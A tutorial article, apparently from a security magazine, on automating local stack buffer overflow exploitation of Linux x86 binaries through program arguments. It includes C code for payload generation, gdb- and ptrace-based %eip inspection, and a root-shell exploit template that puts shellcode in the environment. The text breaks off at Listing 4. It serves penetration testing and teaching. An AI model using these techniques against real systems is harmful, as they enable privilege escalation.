Sub

Which Linux distribution you use?













Automating the exploitation process on Linux x86

Automating the exploitation process on Linux x86

Stavros Lekkas

Inspection of precompiled binaries for flaws is a very painful responsibility for penetration testers. A tool which could identify buffer overflow bugs and produce exploit code would definitely ease the burden.

Imagine coming across a piece of compiled code without the luck to possess its source code. What is more, it exhibits the typical characteristics of having a buffer overflow vulnerability. Since disassembly analysis is an extremely time-consuming process, a tool which could automate the process of exploiting this potential vulnerability would be very useful. Let's have a look at a possible implementation of such a tool.

Claiming that a program contains a stack based buffer overflow bug is an indirect implication that there exists a location, the so called buffer, where data is copied. These buffers exist in stack and they are pointed to by addresses. What is more, when data get copied, the bounds are not checked, with the risk of an overflow. After overflowing a buffer, some other segments out of its scope get overwritten as well. Effective manipulation of such segments with valid data leads to control of the execution flow of the program by just using valid pointing addresses.

The aforementioned data, which get placed into the buffer, sometimes are of the form of user input. The program can accept user input in many possible ways such as the program arguments (or parameters if you like), environmental variables, switches, even run-time program inputs received using the libc gets(), scanf() functions etc. Since each one of these ways for supplying data has its own story, we will focus on the program arguments as our attack vector.

It is very crucial to mention that the automation concept has nothing to do with fuzzy logic and the product tool is not affiliated with fuzzing techniques. Trying to locate specific vulnerabilities by inspecting data generated from deliberate inputs is not fuzzing (see Inset Fuzzing).

In our quest to find paths to control the %eip (see Figure 1 for explanation) via arguments, we have to make some reasoning about what we have to face. For example, given a binary executable, it is either vulnerable or not. The first assumption can be translated as either the nth argument is not vulnerable or it is vulnerable, and if so there is a finite distance which must be filled with characters so as to reach the %eip. Tailoring those requirements into predefined ranges of values assists the creation of a cohesive construction model into a finite framework.

Fuzzing

Fuzzing means acting using Fuzzy Logic. Fuzzy Logic theory deals with ambiguity and tries to categorise uncertainty and classify it using mathematics. The set of all integers, in mathematics, has infinite cardinality, and so does the set of all real numbers, etc. Though, when it comes to computers, everything is finite and calculations with really large operands may fail.

Program arguments

Many ELF executables receive arguments before starting their execution. A typical example is the rm command, where we have to supply as a parameter what we want to delete. Let's imagine an ELF executable, a.out, that just prints a stream of characters as supplied for argument one.

$ ./a.out hakin9

You typed: hakin9

There is a possibility that instead of just calling printf() with argv[1] as parameter, an intermediate buffer, an array of characters, has been declared. Thus, argv[1] is copied into the buffer and printf() uses that buffer as parameter, hopefully with the appropriate format string. There is also a possibility that argv[1] gets copied into that buffer in an unsafe manner. What if we just keep feeding it with larger inputs?

$ ./a.out `perl -e ‘print “A” x 50'`

You typed: AAAAAAA … AAA

Segmentation fault (core dumped)

It crashed and it produced a core. Though, many Linux distributions do no produce core files so we can enable this by just typing:

$ ulimit -c unlimited

This way we allow the production of core files that have unlimited file size. Back to our example, the fact that it produced a core means that, indeed, an intermediate buffer had been used, into which argv[1] had been copied unsafely. By using gdb, the GNU debugger, we can see the instruction that caused the crash.

$ ./gdb -c core ./a.out | grep \#0

#0 0x41414141 in ?? ()

This makes sense because 0x41 is the hexadecimal equivalent of A. Figure 1 gives a more detailed conceptual overview.

Figure 1. Conceptual overview of an unsafe copy operation

The instruction pointer got overwritten with an invalid address leading to a crash (see also Article Overflowing the stack on Linux x86 which is available on the hakin9.org website).

Instead of supplying it with fifty A's, we could have found the exact distance until the end of %ebp, fill that distance with A's and then supply a valid address. This way we can control the flow of the executed program in a way that it will execute code we can supply. What is more, this can be done automatically.

Information gathering

At this point we shall mention that the information that concerns us about a given executable is the argument number, which gives us a pathway to manipulate the %eip, and the distance until the %eip. At the previous example of a.out, we could start the gdb application for every possible length value of the argument setting every time a buffer payload which increases incrementally. Then we have to inspect the value of the instruction pointer and decide the degree that it has been affected by our inputs. If the executable is indeed vulnerable, we will see three different states during our examination. The following three states will occur in sequence:

  • A value that does not correspond to an alternation of the instruction pointer may occur multiple times.

  • A value that corresponds to partial overwriting of the instruction pointer occurs once and we know that the next try deterministically corresponds to a third state (e.g.: 0x00414141).

  • A value that corresponds to a total overwriting of the instruction pointer (e.g.: 0x41414141).

Note that a successful partial overwriting corresponds to altering the three out of four bytes of the %eip. The address 0xbfff4141 cannot be assumed as suspect for partial overwrite since it is a valid stack pointing address. The address 0xbf414141 though, is much more suspect because it happens really seldom for the stack to grow that large. Although the final implementation incorporates this issue, it would not be a bad idea to assign weight constant values to indicate how much critical and deliberate the potential overwriting can be.

Payload creation algorithm one

The subsystem that is responsible for creating the payloads does nothing more than to create buffers filled with A's when it is asked to do so. A fairly easy to understand policy to produce such payloads is the famous brute force technique. We will create buffers of all possible lengths, which will be tested one by one until an alternation sign has been made or until we reach the maximum buffer length testing range. If the argument is vulnerable and our test range is in the same range then the deliberate alternation will be definitely spotted.

Figure 2. Flowchart of payload creation algorithm one

Figure 2 describes this increase by one algorithm. Creating incremental buffers when the increment is just one byte has some advantages and disadvantages. One of the advantages is that it reduces programming complexity for the sake of computational time. It actually offers a more abstract implementation. If the increment is larger than a single A then it would definitely speed up the process but would introduce conflicts with our three possible %eip states. Recall that an alternation is categorized as deliberate if and only if all four bytes of the %eip have been altered and three out of four bytes had been altered at the previous try. Listing 1 is an implementation of the payload creation subsystem as a fully reusable component.

Listing 1. The payload creation subsystem

 
char *make_payload(char *buffer, int policy, LINT num)
// policies:
//          _APPEND ~ append $num 'A'[s]
//          _REMOVE ~ remove $num 'A'[s]
{
char *my_buffer;
LINT i, len = strlen(buffer);
if( policy == _APPEND ) {
if( !(my_buffer = (char *)malloc( len + num + 1 )) ) {
fprintf(stderr, "[!] make_payload(): malloc() append error.n");
exit(EXIT_FAILURE);
}
CLEAR(my_buffer);
if( len != 0 )
for( i = 0; i < len; i++ )
my_buffer[i] = *(buffer++); 
for( i = len; i < len + num; i++ )
my_buffer[i] = 'A';
my_buffer[i] = 0x00;
}
if( policy == _REMOVE ) { 
if( !(my_buffer = (char *)malloc( len - num + 1 )) ) {
fprintf(stderr, "[!] make_payload(): malloc() remove error.n");
exit(EXIT_FAILURE);
}
CLEAR(my_buffer);   
for( i = 0; i < len - num; i++ )
my_buffer[i] = *(buffer++);
my_buffer[i] = 0x00;
} 
return my_buffer;
}

Since the code of Listing 1 uses malloc() to allocate a buffer and then returns a pointer to it, it should be freed somehow. This can be done in the following way:

char *p;

p = make_payload(“foo”,

_APPEND, 1);

free(p);

Payload creation algorithm two

Instead of increasing the payload by a single A, it is as well possible to increase it with blocks of A's. However, it conflicts with our three possible %eip states and that is why it is not implemented in the tool. To be more precise, there is a considerable probability that state 2 will never be met, which conflicts with the currently defined flow of internal states. When creating buffers from blocks of A's the most efficient value seems to be three A's per block in terms of speed. To be more specific, the ideal value is produced by the formula:

block_len = word_size(

%eip size in bytes) - 1 <=> (1)

block_len = 4 - 1 <=>

block_len = 3

This gives us three possible sets of %eip overwriting scenarios. One of the most interesting cases happens when %eip is totally overwritten and the payload length is not well adjusted to the precise distance. At that point, the payload production subsystem shall produce decreased payloads. In this case, state 3 gets the occurrence priority of state 2 and vice versa.

All in all, this method provides speed but includes both forward and reversed payload generation (see Figure 3). With appropriate criteria categorization of the %eip alternation, it would be an ideal method to produce payloads using fixed blocks. Recall that this algorithm is not adopted in the tool code, thus, if this article is of interest to you, it is up to you to develop it effectively and efficiently.

Figure 3. Flowchart of payload creation algorithm two

Inspection algorithm one

The execution-and-inspection subsystem is by far the most valuable component of this tool because it contains a simple decision engine. Its role is not as passive as the payload production subsystem. This subsystem is responsible for executing the vulnerable application with the constructed payload in the relevant argument and decides according to the %eip value if the desired outcome has been revealed. This decision making process is achieved through a list of prioritized heuristics, which are of the simple form of if-then statements.

A very fast and dirty way to develop such a component is by using the gdb, grep and awk command-line tools. A valid command shall be produced and with the aid of pipes sensitive information will get extracted. Listing 2 implements this technique.

Listing 2. Execution and inspection subsystem using gdb, grep and awk

int exec_and_inspect_1(char *buffer, int arg, char *vulnfile)
{
//returns: -2 ~ internal error
//             -1 ~ not a smash
//              0 ~ definately a smash :)
//              1 ~ probably a smash
char   tmp[512], bufresponse[64];
int    inspec_val, i;
FILE   *fd;
u_long address;
close(2); // gdb prints to stderr
if( (fd = fopen(CMDF, "w+")) == NULL ) {
ttyd = open("/dev/tty", O_RDONLY);
fprintf(stderr, "[!] exec_and_inspect_1(): error creating gdb command file.n");
fflush(stderr);
return -2;
}
fprintf(fd, "r ");
for(i = 0; i < arg - 1; i++)
fprintf(fd, "foo ");
fprintf(fd, "%snquitn", buffer);
fclose(fd);
CLEAR(tmp);
snprintf(tmp, 511, "%s %s --command=%s|%s 0x | %s {'print $1'} > %s",
GDB, vulnfile, CMDF, GREP, AWK, RETF); 
system(tmp);
unlink(CMDF);
CLEAR(bufresponse);
if( (fd = fopen( RETF, "r")) == NULL ) {
ttyd = open("/dev/tty", O_RDONLY);
fprintf(stderr, "[!] exec_and_inspect_1(): error reading gdb output file.n");
fflush(stderr);
return -2;
} 
fgets(bufresponse, 63, fd);
fclose(fd);
address = strtoul(bufresponse, 0, 16);
if(verbose)
fprintf(stdout, "-> Buffer len: %ldn", strlen(buffer));
Continued on next page

Listing 2. Execution and inspection subsystem using gdb, grep and awk (continued)

switch( address_status( address ) ) {
case 0: // 0x41414141
if( flag == 1 ) { //if the 3 lsb have been overwritten previously
if(verbose) {
fprintf(stdout, "-> %%eip status: definately smashed. ");
printfixed(address);
}
inspec_val = 0;
}
else { // eip smashed with the first try, this implies 2 cases.
// 1st: gdb --command reported wrong address so we must skip
// 2nd: fast check found a vuln buffer 
if(verbose) {
fprintf(stdout, "-> %%eip status: probably smashed. ");
printfixed(address);
}
inspec_val = -1;
}
break;
case 1:// 3 lsb have been overwritten
// either we are about to overwrite the %eip at next try or
// fast check smashed 3/4 of the %eip. interesting, we should
// force an additional round to get ensured.     
flag = 1;
if(verbose) {
fprintf(stdout, "-> %%eip status: partially smashed. ");
printfixed(address);
}
inspec_val = -1;
break;
case -1:          
if(verbose) {
if(address) {   
fprintf(stdout, "-> %%eip status: not smashed. ");
printfixed(address);
}
else
fprintf(stdout, "-> %%eip status: not smashed. (unaccessible)n");
}
inspec_val = -1;
break;
default:
fprintf(stderr, "[!] I shouldn't be here.n");
inspec_val = -2;       
}
unlink(RETF);   
return inspec_val;
}

The payload and the argument that is about to get tested are supplied as function parameters (see Listing 2). The general design principle that the author adopted is to return handling codes back to the previous layer (caller textual level) which in turn does the same to its previous one. This tree-like design offers great flexibility. The advantage of this technique is that it offers very good testing speed. Though, it is highly linked with third party applications, the integrity of which is unknown.

Inspection algorithm two

A second potential implementation of an execution-and-inspection subsystem could be based on the ptrace() system call. It provides a nice set of low level features, some of which we are about to adopt. All in all, ptrace enables one process to control the execution of another. The traced process behaves normally, until a signal is caught. We will call ptrace() with PTRACE_TRACEME as the value of the request to enable control over a child process. The latter process will be created using fork(). PTRACE_GETREGS will be used to fetch all register values into an appropriate register structure, aiding us with the %eip inspection. Finally PTRACE_SINGLESTEP will assist us on finding the malicious instruction. The implementation corresponds to Listing 3.

Listing 3. Execution and inspection subsystem using the ptrace syscall

int exec_and_inspect_2(char *buffer, int arg, char *vulnfile)
{
// returns: -2 ~ internal error
//          -1 ~ not a smash
//           0 ~ smash :)          
REGISTERS regs;
pid_t     pid;
int       inspec_val = -1, wait_val, i = 1;
LLONG     counter = 0;
char      *args[MAX_ARGS] = {NULL};
args[0] = "lazyjoe";
for(i = 1; i <= arg - 1; i++)
args[i] = "foo";
args[i] = buffer;
args[i+1] = NULL;
switch( pid = fork() ) {
case -1:
return -2;
break;
case 0:
ptrace(PTRACE_TRACEME, 0, 0, 0);
execv(vulnfile, args);
break;
default:
wait(&wait_val);
if(verbose)
fprintf(stdout, "-> Buffer len: %ldn", strlen(buffer));
while(wait_val == 1407) {
counter++;
counter_tot++;
if( ptrace(PTRACE_GETREGS, pid, 0, &regs) != 0 ) {
fprintf(stderr, "[!] ptrace(): error fetching registers.n");
fflush(stderr);
return -2;
}
if( ptrace(PTRACE_SINGLESTEP, pid, 0, 0) != 0 ) {
fprintf(stderr, "[!] ptrace(): error restarting.n");
fflush(stderr);
return -2;
}
if(verbose) {
fprintf(stdout, "-> eip: %8xr", regs.eip);
fflush(stdout);
}     
if( regs.eip == 0x41414141 ) {
if(verbose) {
fprintf(stdout, "-> Number of instructions this round: %ldn", counter);
fprintf(stdout, "-> Total number of instructions: %ldn", counter_tot);
}
inspec_val++; //0
kill(pid, SIGKILL);
}
wait(&wait_val);
}
}
return inspec_val;
}

Notice that the implementation of Listing 3 does not respect the three-state sequence of occurence. This is because this technique does not deal with string manipulation, as the previous one, but it straightly interacts with register values. Both this and the previous techniques receive the same information as parameters, and produce the same error handling codes for a given situation.

This technique is generally very time-consuming and one should never rely on it for large buffer values. Although it is not fast enough, if used in verbose mode it is very interesting as it prints all the instruction values passed by %eip during testing time. We are talking about millions or more of instructions and therefore logging them is not encouraged. Those instructions can be used to identify stack frame patterns aiding a deeper analysis of the executable.

Cooperation of functional components

If it has not been clear until now, the consistency of the actions of the tool is highly dependant on correct design-based cooperation of the subsystems. The two core subsystems communicate with each other by sending handling codes to their intermediate management layer, the find_dist() function (see the source code for the implementation). Their feedback driven cooperation is conceptually depicted in Figure 4.

Figure 4. Coopeation of functional components

The module numbered as 7 in Figure 4 is responsible for the identification of the %eip status based on its hardcoded heuristics. This is how the decision process takes place and therefore how the precise distance can be found.

The exploit code

Up till now we have seen how to locate the precise distance via a vulnerable argument. What follows is the exploit generation subsystem whose concept would be much more easily understood by going over the theory.

An exploit code is a piece of code crafted for the purpose that its name suggests: to take advantage of a situation. This situation is a programming flaw and as far as it concerns the article, it is a local stack based argument overflow. By exploiting the programming flaw we can execute commands of our choice. These commands are the famous shellcode part of the exploit code. It is named shellcode because, after all, it executes a new shell. They are presented in machine code format which looks like a hexadecimal sequence (see Article Linux shellcode optimization which is available on hakin9.org website). As writing shellcodes is out of the scope of this article, we will assume a shellcode that spawns a shell, by issuing the following commands in sequence:

setuid(0);execve ("/bin/sh", 0);exit (0);

Our aim is to pass to the actual vulnerable program some junk bytes until a desired distance has been reached. This distance is the start of the instruction pointer (%eip) which will be overwritten with a valid address that points to our shellcode. This is a very interesting part. How can we know deterministically the address of where our shellcode be located exactly? Can we identify a formula that gives a universally valid pointing address to it? Can we avoid the need for specific information that is related with our Linux distribution? An answer to such questions can be found by introducing a generic exploit code template.

The direct hit method

On our way to establish a generic exploit code template, we fall onto the stack. The stack is structured in a way that assists us in finding a universal formula. The stack top varies depending on our program. Though, the last valid address that points into the stack-space is fixed and it is 0xbfffffff. Figure 5 depicts the stack at its bottom.

Figure 5. The Linux stack at its bottom

Data get executed bottom-up while the stack grows in a top-down manner. The environment is at a fixed distance from the stack bottom and we can find its nth item with the aid of Figure 5. The formula for the nth environment item is:

address = 0xbfffffff - 4

- ( strlen(prog_name) + 1 )

- strlen(env[n]); (2)

which equals to:

address = 0xbffffffa

- strlen(prog_name)

- strlen(env[n]); (3)

The environment looks like an ideal place for placing our shellcode. We can put our shellcode into an environment structure and execute the vulnerable binary using the previous environment. This can be done using either the execve() or execle() functions as far as their last parameter is an environment structure. This method does not require any NOP (0x90) opcodes to sled over because it points directly to the shellcode in stack.

Assembling the gathered information

So long, and thanks for all the fish (Douglas Adams, The hitch hiker's guide to the galaxy, 1984). Having already identified the distance until the start of %eip and hopefully our formula, we can now create the exploit code template. An efficient implementation should look like the one of Listing 4.

Listing 4. A generic exploit code template

// our binary
#define BIN

Web Design Services